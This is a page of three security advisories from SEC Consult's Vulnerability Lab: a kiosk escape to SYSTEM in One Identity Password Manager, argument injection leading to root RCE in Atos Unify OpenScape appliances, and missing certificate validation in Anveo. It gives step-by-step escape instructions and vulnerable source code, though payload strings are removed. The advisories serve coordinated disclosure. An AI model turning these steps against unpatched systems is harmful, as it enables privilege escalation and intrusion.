https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF L. Donaubauer, M. Keck / @2023 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231206-0 > ======================================================================= title: Kiosk Escape Privilege Escalation product: One Identity Password Manager Secure Password Extension vulnerable version: <5.13.1 fixed version: 5.13.1 CVE number: CVE-2023-48654 impact: critical homepage: https://www.oneidentity.com/products/password-manager/ found: 2023-10-09 by: Stefan Schweighofer (Office Vienna) Constantin Schieber-Knöbl (Office Vienna) Armin Weihbold (Office Linz) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "One Identity delivers solutions that help customers strengthen operational efficiency, reduce risk surface, control costs and enhance their cybersecurity. Our Unified Identity Platform brings together best-in-class software to enable organizations to shift from a fragmented identity strategy to a holistic approach." Source: https://www.oneidentity.com/company/ Business recommendation: ------------------------ The vendor provides a patch version 5.13.1 which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- The Password Manager Application by One Identity enables users to reset their Active Directory passwords on the login screen of a Windows client, with the Secure Password Extension. The Secure Password Manager Extension launches a Chromium based browser in Kiosk mode to provide the reset functionality. Due to application-specific functionalities the Password Manager Extension suffers from two exploitable Kiosk Escape vulnerabilities which allow a local, pre-authenticated attacker to escalate the privileges to SYSTEM. 1) Password Manager Kiosk Escape with Google ReCAPTCHA (CVE-2023-48654) The Password Manager Extension uses Google ReCAPTCHA, which enables an attacker to escape the Kiosk Mode of the browser and gain "nt authority\system" permissions on the login screen of the targeted machine. This is possible due to the fact that Google ReCAPTCHA links to external websites, which open in a new browser window and enable an attacker to navigate to other external websites. 2) Password Manager Kiosk Escape after Session Timeout The Password Manager application provides a link to a help page of One Identity. This link references an external site and is therefore hidden in the Kiosk Mode browser of the Password Manager Extension. If the Password Manager Extension website is loaded after an active session expires the link to the external One Identity websites gets shown. This enables an attacker to escape the Kiosk Mode of the browser and gain "nt authority\system" permissions on the login screen of the targeted machine. Proof of concept: ----------------- 1) Password Manager Kiosk Escape with Google ReCAPTCHA (CVE-2023-48654) An attacker requires access to a locked machine, where the Password Manger Extension is installed, either via physical (pre-auth) or remote (RDP) access. From the login screen the Password Manger Extension Kiosk mode browser can be launched. Since Google ReCAPTCHA is used on the Password Manger website the Google ReCAPTCHA icon is also shown on the website and provides a link to an external website via the "Privacy" button of the Google ReCAPTCHA field. 2) Password Manager Kiosk Escape after Session Timeout An attacker requires access to a username to login to either the Password Manager website or a logged in user, which leaves the session open until the session expires. Since the Password Manager uses Active Directory credentials, the username from the Windows login screen can be used to log into the website. For this attack the session of a logged-in user has to expire. After the session expiration the Password Manager website gets reloaded and displays a help icon that is usually hidden. The help icon links to the external One Identity website., from witch it is possible to navigate to the Google Search website using the Sign In option of the One Identity website. The Sign In page has the option to login with a Facebook account and information about cookies is displayed on this page, which links to a Google Chrome website. For both vulnerability 1 and 2, an attacker can use the Google Search website and trigger the "search by image" feature. This "search by image" feature can be used to trigger an upload, which then opens a file explorer window for file selection. The file explorer window makes it possible to input "cmd" in the path field of the file explorer to open a command prompt. The created command prompt is executed with highest "nt authority\system" permissions. Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 5.13 It is assumed that all previous versions are affected as well. Vendor contact timeline: ------------------------ 2023-11-06: Contacting vendor through vendor security contact form https://support.oneidentity.com/de-de/essentials/reporting-security-vulnerability 2023-11-07: Vendor is able to reproduce both escapes, internal discussion with product team needed. 2023-11-14: Vendor notifies us that the product team fixed the vulnerabilities and will release an update soon. Asking for CVE numbers. 2023-11-15: Vendor will not assign CVE numbers, we are going to request them. Patch release scheduled for 17th or the week after. 2023-11-17: Receiving one CVE number from MITRE, asking about the second one; No response. 2023-11-20: Asking for status update as no patch was released on 17th. 2023-11-21: Patch was postponed to 1st December, setting our release date to 6th December. 2023-12-01: Vendor releases fixed version v5.13.1. 2023-12-06: Coordinated release of security advisory. Solution: --------- The vendor provides a patch which can be downloaded from https://support.oneidentity.com/password-manager/5.13.1 The release notes of the vendor can be found here: https://support.oneidentity.com/technical-documents/password-manager/5.13.1/release-notes/ Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Schweighofer, C. Schieber-Knöbl, A. Weihbold / @2023 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231205-0 > ======================================================================= title: Argument injection leading to unauthenticated RCE and authentication bypass product: Atos Unify OpenScape Session Border Controller (SBC) Atos Unify OpenScape Branch Atos Unify OpenScape BCF vulnerable version: OpenScape SBC before V10 R3.4.0 OpenScape Branch before V10 R3.4.0 OpenScape BCF V10 before V10 R10.12.00 and V10 R11.05.02 fixed version: OpenScape SBC V10 R3.4.0 or higher OpenScape Branch V10 R3.4.0 or higher OpenScape BCF V10 R10.12.00 or higher, V10 R11.05.02 CVE number: CVE-2023-6269 impact: Critical homepage: https://unify.com/ found: 2023-09-01 by: Armin Weihbold (Office Linz) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Unify is is the Atos brand for communication and collaboration solutions Unify is the newest member of the Atos family, combining Atos’ knowledge and reputation in the IT services market with Unify’s expertise in unified communications and collaboration to provide customers with seamless services solutions for their entire digital portfolio. Within Atos, Unify continues to deliver a unique integrated proposition for unified communications and real time capabilities." Source: https://unify.com/en/expert/unify Business recommendation: ------------------------ SEC Consult recommends users of this solution to immediately install the latest patch from the vendor. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Argument injection leading to unauthenticated RCE and authentication bypass (CVE-2023-6269) The administrative web interface insufficiently escapes supplied login credentials before passing them to a user management application, leading to an unauthenticated attacker being able to gain root access to the appliance via SSH. Another possibility to exploit this vulnerability is to append a special argument during logon to completely bypass the authentication of the web interface. A previously unauthenticated attacker can logon as administrator without any known credentials. Proof of concept: ----------------- 1) Argument injection leading to unauthenticated RCE and authentication bypass (CVE-2023-6269) Example 1) Gaining unauthenticated SSH root access The file receiving data from the login page is `auth.php`, here the user-provided credentials are passed on to the function `PasswordMgr::authPassword` after some checks on the supplied username. ```php // /srv/www/htdocs/auth.php // [...] $ret=false; $real_user=''; $error = ''; $local_user=strip_tags($_POST['username']); // [...] if( !sessionLimitReached() ) { // Authenticate user/password... $privilege = PasswordMgr::getUserPrivilege($local_user); if (($local_user == 'assistant') || ($local_user == 'cdr') || (!PasswordMgr::isUserEnabled($local_user))){ $ret = false; } else { switch ($privilege) { case 'admin': $ret = PasswordMgr::authPassword($_POST["username"], $_POST["password"], $error, $real_user, $local_user, FALSE); break; // [...] } } // [...] } // [...] ``` The function `PasswordMgr::authPassword` in `core/PasswordMgr.php` is just a wrapper around `call_osbpasswd` in the same file. ```php // /srv/www/htdocs/core/PasswordMgr.php public static function authPassword($username, $password, &$error, &$real_user, &$local_user, $local = FALSE) { $error=''; if ( PasswordMgr::call_osbpasswd("auth", $username, $password, $error, $real_user, $local_user, $local ) ) { $error='Current Password does not match user'; return false; } return true; } ``` The function `call_osbpasswd` is responsible for anything related to user management, it does this by constructing shell arguments and supplying them to the executable `/osb/bin/osbpasswd` which is executed with root privileges via `cfgUtilExecSudo`. This executable handles the actual authentication, creation of users, and other tasks. In the case of authentication the arguments are written to a temporary file and read from there. Before that the supplied password is escaped using `escapeshellcmd` instead of `escapeshellarg`. This means that space characters (hex 0x20) in the password are left intact allowing for argument injection. ```php // /srv/www/htdocs/core/PasswordMgr.php public static function call_osbpasswd( $method, $username, $password, &$output, &$real_user, &$local_user, $local, $extraArg = '' ) { // [...] $curruser = 'GUI'; // [...] $params = "$method"; if ($local) $params .= ' --local'; if ($username != '') $params .= " --user $username"; if ($curruser != '') $params .= " --curruser $curruser"; if ($extraArg != '') $params .= "$extraArg"; $file = ''; // [...] else { $params .= " --password "; $fakePar = $params."xxxxxx"; $params .= escapeshellcmd($password); $params .= "\n"; $file = tempnam('/osb/var/tmp','osbpasswd.'.md5($params).'.'); /*E.g.: /opt/openbranch/var/tmp/osbpasswd.f9e2a9fcf29c6275830257316d560e27.CG4IcQ */ cfgUtilEcho( $params, $file ); $command = "/osb/bin/osbpasswd ".$fakePar." --file ".$file; } $outArray = array(); $ret = cfgUtilExecSudo($command, $outArray, FALSE, TRUE); // [...] return $ret; } ``` The function that is responsible for parsing command line arguments in the called application `/osb/bin/osbpasswd` iterates over arguments and sets global variables based on them. This is done in a loop and no check is done if that argument was already set. This means an attacker can override all parameters by specifying them again. ```C int parse_arguments(int argc, char **argv, int n) { // [...] while ( n < argc && argv[n] ) { // [...] else if ( !strcmp("--user", argv[n]) ) { if ( ++n < argc ) arg_user = argv[n]; } else if ( !strcmp("--shell", argv[n]) ) { if ( ++n < argc ) arg_shell = argv[n]; } // [...] else if ( !strcmp("auth", argv[n]) ) { arg_command_name = argv[n]; arg_command_number = 1; } else if ( !strcmp("add", argv[n]) ) { arg_command_name = argv[n]; arg_command_number = 6; } // [...] ++n; } return 0LL; } ``` The combination of faulty escaping of the supplied password and overly permissive parsing of arguments in the called binary leads to an attacker being able to request arbitrary operations from the `/osb/bin/osbpasswd` binary with arbitrary arguments. An attacker could for example create a new user with SSH access and change the password of the root user leading to a complete compromise of the system. To demonstrate the vulnerability, it is sufficient to [...] [ Proof of concept removed ] - this creates a new user with SSH access, the second one [...] [ Proof of concept removed ] which changes the password of the root user. The attacker can then login [...] to gain root access. Example 2) Bypassing the web interface logon as administrator As described in example 1, the same vulnerability can also be exploited to bypass the logon for the web interface and immediately gain access as administrator because the arguments for the command-line tool are passed and evaluated. By supplying the [...] following [...] string [...], it is possible to logon without known credentials: [ Proof of concept removed ] [...] Afterwards the attacker is logged on as administrator (or any other supplied user account). Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * Atos Unify OpenScape Session Border Controler (SBC) Firmware Version V10 R3.3.0 According to vendor, versions before V10 R3.3.0 are affected as well. The vendor confirmed that the following products are vulnerable: * Atos Unify OpenScape SBC V10 before V10 R3.4.0 * Atos Unify OpenScape Branch V10 before V10 R3.4.0 * Atos Unify OpenScape BCF V10 before V10R10.12.00 and V10R11.05.02 Vendor contact timeline: ------------------------ 2023-09-13: Contacting vendor through email obso@atos.net; sending encrypted advisory (S/MIME) 2023-09-25: Call with vendor, patch has already been developed, available internally for testing & QA since 22nd. 2023-09-26: Preliminary vendor security advisory available, giving feedback regarding recommendations. Vendor informs customers in advance (TLP:AMBER), patch planned for 2023-09-27. 2023-10-04: Vendor security advisory public release (TLP:WHITE). 2023-10-06: Asking regarding next steps for affected product Atos Unify OpenScape BCF. 2023-10-10: Vendor confirms that OpenScape BCF is affected as well and added it to their advisory. 2023-11-27: Reserving CVE-2023-6269 and sending it to vendor, defining release date of 5th December. 2023-12-05: Coordinated release of security advisory. Solution: --------- The vendor provides a patch for the affected products: * Atos Unify OpenScape Session Border Controller Firmware Version V10 >=R3.4.0 * Atos Unify OpenScape Branch version V10 >=R3.4.0 * Atos Unify OpenScape BCF version V10 >=V10R10.12.00 and V10R11.05.02 The patches can be obtained for registered customers through the vendor's download server: https://sws.unify.com/SWSIntranet/SWSIntra.aspx or via https://unify.com/en/partner/partnerportal https://unify.com/en/support/kunden-support-portal Furthermore, the vendor has also released a security advisory which is available here: https://networks.unify.com/security/advisories/OBSO-2310-01.pdf Workaround: ----------- In addition to deploying the patch, limit access to the administrative web application and SSH ports to authorized personnel on the network level. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Weihbold / @2023 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231128-0 > ======================================================================= title: Missing Certificate Validation & User Enumeration product: Anveo Mobile App and Server vulnerable version: Mobile App: 10.0.0.359 / 2016-07-13; Server: 11.0.0.5 fixed version: - CVE number: - impact: Medium homepage: https://www.anveogroup.com/en/mobile-apps-for-dynamics/ found: 2023-05-28 by: Daniel Hirschberger (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Create your own individual Mobile App with Anveo. Our base, out of the box solutions offer many useful functions, and can be flexibly adapted to your requirements: the Anveo Service App, Anveo Sales App, and Anveo Delivery App. You are looking for a mobile App for a different scenario? Not a problem with the Anveo Mobile App Builder! Thanks to the toolkit character of the solution, configuration of a completely new, custom App is simple." Source: https://www.anveogroup.com/en/mobile-apps-for-dynamics/ Business recommendation: ------------------------ The vendor was unresponsive and did not reply to our communication attempts and even deleted our comment to request a contact on LinkedIn, see the timeline section further below. There is no solution known to us for this security issue. In case you are a customer of Anveo, request an update from them about the issue. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Missing Certificate Validation The Windows application was tested which does not perform certificate validation and is therefore vulnerable to man-in-the-middle attacks which might allow an attacker to gain access to sensitive data. 2) User Enumeration The login is vulnerable to user enumeration because the error message for a non-existent user differs from the error message when a user exists. This allows an attacker to perform targeted brute-force attacks and potentially take over other user accounts. Proof of concept: ----------------- 1) Missing Certificate Validation The application does not validate the server certificate. To verify this, a new self-signed certificate was created with the openssl commandline tool. Afterwards, an openssl server was spawned with netcat: [ POC removed] When adding a new account in the application with the IP and port of this server, a connection is attempted. Now a special string has to be sent from the netcat listener to the client. As a response, the client tries to authenticate against the server with the username and password: <img certificate_validation.png> The part between <EOS> and <EOSC> can be base64-decoded and decompressed with zlib which yields the following output: [ POC removed ] The "PW" Parameter contains the base64-encoded password, in this case "unknown". 2) User Enumeration When a non-existent user tries to login, the error message shows "Cannot find user": <img user_nonexistent.png> When a valid username but a wrong password is submitted, the server responds with "Username or password is not correct": <img user_exists.png> Vulnerable / tested versions: ----------------------------- The following version has been tested: * Application version 10.0.0.359 / 2016-07-13 (the Windows version was tested) The vendor did not respond to our communication attempts, hence it is unknown whether further versions are affected as well. Vendor contact timeline: ------------------------ 2023-06-12: Contacting vendor through email info@AnveoGroup.com Asking for security contact, no response 2023-06-26: Contacting vendor through same email again, no response. 2023-07-24: Contacting vendor through technical support email support@AnveoGroup.com Asking for security contact again, no response. 2023-09-15: Contacting vendor again through info@AnveoGroup.com, support@AnveoGroup.com and datenschutz@AnveoGroup.com. Ticket got automatically created, but no response. 2023-09-19: Posted a message/comment on LinkedIn at Anveo Group to contact us. Besides a few profile views from employees (Team Lead Anveo Mobile App, Social Media Marketing, CEO) no response. Our comment then got deleted by Anveo Group. Comment: "Hi Anveo Group, we have been trying to reach your company since June through our responsible disclosure process as we have identified some security issues in your products. We never received any response via multiple email addresses (found on your website). Could you please get in touch with us and provide us with a person responsible for security? Thank you!" 2023-09-20: Contacting third party whether they received a patch; no response. 2023-10-09: Contacting again; no response. 2023-10-23: Contacting again; no response. 2023-11-17: Final attempt, asked third party for info again, tried to contact "support@anveogroup.com" through ticket again. No response from vendor, but third party replied, that they also did not receive any response from Anveo. 2023-11-28: Public release of security advisory. Solution: --------- The vendor was unresponsive and did not reply to our communication attempts and even deleted our comment to request a contact on LinkedIn, see the timeline section. There is no solution known to us for this security issue. In case you are a customer of Anveo, request an update from them about the issue. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger / @2023 </code></pre>